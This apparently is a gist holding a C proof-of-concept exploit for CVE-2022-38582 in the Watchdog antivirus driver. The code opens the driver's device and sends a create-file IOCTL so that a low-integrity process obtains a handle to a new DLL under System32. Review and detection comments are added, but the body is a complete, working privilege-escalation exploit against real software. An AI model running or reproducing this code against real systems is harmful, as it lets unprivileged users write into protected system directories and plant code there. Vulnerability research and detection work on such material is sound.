PoC for Watchdog AV (CVE-2022-38582)
// exploitation will require issuing the described IOCTL
// once complete, a low integrity user may obtain write-privileges to the file
// by re-opening with CreateFileA / NtCreateFile
#include <Windows.h>
#include <stdio.h>
// Control code of the driver's file-create request as used by this PoC.
#define IOCTL_WAV_CREATE_FILE 0x80002004
// Win32 device name the PoC opens to reach the driver.
// NOTE(review): the header comment states a low-integrity caller can open this device;
// the device object's ACL is not visible here, so that claim is taken from the gist, not verified.
const char* g_DeviceName = R"(\\.\wsdk)";
BOOL WAV_CreateFile(HANDLE hDevice, const wchar_t* strFileName, BOOL bOpenExisting, PHANDLE lpOutHandle);
// Input buffer layout for IOCTL_WAV_CREATE_FILE as this PoC fills it.
// Field meanings beyond the names (and the "0x10" annotation) are not verified here;
// the layout was presumably recovered from the driver — TODO confirm against the binary.
typedef struct WSDK_CREATE {
DWORD dwDisposition;
DWORD dwAccessMask; // 0x10
BYTE reserved0[0x6c]; // padding up to the file name; this PoC leaves it zeroed
WCHAR wstrFileName[MAX_PATH + 1]; // NT path of the file the driver is asked to create/open
} WSDK_CREATE, * PWSDK_CREATE;
// Output buffer layout for IOCTL_WAV_CREATE_FILE: the handle the driver created
// and the NTSTATUS of its own create call.
typedef struct WSDK_CREATE_OUT {
HANDLE hFile;
NTSTATUS status;
}WSDK_CREATE_OUT, * PWSDK_CREATE_OUT;
// Sends IOCTL_WAV_CREATE_FILE to hDevice, asking the driver to create/open strFileName
// and hand the resulting handle back in *lpOutHandle.
//
// Returns TRUE only when the driver reports a non-NULL handle together with a zero
// status; FALSE on any allocation, DeviceIoControl or driver-side failure.
// bOpenExisting is accepted for the caller's convenience but never read:
// dwDisposition is hard-coded to 0 below.
//
// Defender's view: the driver performs the create on behalf of the caller, so the
// file ends up owned by the driver's context rather than the requesting process.
// Any caller-supplied path must be validated (or the create must be done while
// impersonating the caller) on the driver side; this PoC shows neither happens.
BOOL WAV_CreateFile(HANDLE hDevice, const wchar_t* strFileName, BOOL bOpenExisting, PHANDLE lpOutHandle)
{
DWORD dwBytesReturned = 0;
HANDLE hHeap = GetProcessHeap();
if (!lpOutHandle) {
return FALSE;
}
// Output buffer is deliberately larger than WSDK_CREATE_OUT; dwBytesReturned is
// never compared against sizeof(WSDK_CREATE_OUT) before the cast further down.
LPVOID lpOutBuffer = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x1000);
if (!lpOutBuffer) {
return FALSE;
}
// HEAP_ZERO_MEMORY is what provides the NUL terminator for wstrFileName (see memcpy below).
PWSDK_CREATE lpCreateArgs = (PWSDK_CREATE)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(WSDK_CREATE));
if (!lpCreateArgs) {
HeapFree(hHeap, 0, lpOutBuffer);
return FALSE;
}
// Driver-specific values; their exact meaning is not recoverable from this file.
lpCreateArgs->dwAccessMask = 1;
lpCreateArgs->dwDisposition = 0;
// NOTE(review): copies lstrlenW(strFileName) characters with no bound against
// MAX_PATH; a longer path overruns wstrFileName inside the heap block.
memcpy(lpCreateArgs->wstrFileName, strFileName, lstrlenW(strFileName) * sizeof(wchar_t));
BOOL bRes = DeviceIoControl(
hDevice,
IOCTL_WAV_CREATE_FILE,
lpCreateArgs,
sizeof(WSDK_CREATE),
lpOutBuffer,
0x1000,
&dwBytesReturned,
NULL
);
if (!bRes) {
// NOTE(review): lpOutBuffer and lpCreateArgs are leaked on this path.
printf("DeviceIoControl - %x\n", GetLastError());
return FALSE;
}
PWSDK_CREATE_OUT lpOutInfo = (PWSDK_CREATE_OUT)lpOutBuffer;
// Success as defined by this PoC: the driver returned a handle and a zero NTSTATUS.
if (lpOutInfo->hFile && !lpOutInfo->status) {
*lpOutHandle = lpOutInfo->hFile;
HeapFree(hHeap, 0, lpOutBuffer);
HeapFree(hHeap, 0, lpCreateArgs);
return TRUE;
}
HeapFree(hHeap, 0, lpOutBuffer);
HeapFree(hHeap, 0, lpCreateArgs);
return FALSE;
}
// Entry point: opens the driver's device, asks it to create a file under System32
// and prints the handle it hands back. Exit code -1 if the device cannot be opened,
// 0 otherwise (including when the IOCTL itself fails).
//
// Detection note: the observable events are a process opening the \\.\wsdk device
// and a file creation under System32 attributed to the driver rather than to the
// requesting process; both are worth alerting on outside the vendor's own components.
int main() {
HANDLE hDevice = CreateFileA(
g_DeviceName,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
// CreateFileA reports failure with INVALID_HANDLE_VALUE; the NULL check is belt-and-braces.
if (!hDevice || hDevice == INVALID_HANDLE_VALUE) {
printf("CreateFileA - %x\n", GetLastError());
return -1;
}
HANDLE hFile = 0;
// bOpenExisting (FALSE) is ignored by WAV_CreateFile; dwDisposition is fixed there.
BOOL bResult = WAV_CreateFile(hDevice, LR"(\??\C:\Windows\System32\lmfao.dll)", FALSE, &hFile);
if (bResult) {
printf("Got handle to file: %p\n", hFile);
}
// NOTE(review): neither hDevice nor hFile is closed before exit; the OS reclaims them.
return 0;
}
@ElliottDenlinger

:shipit:
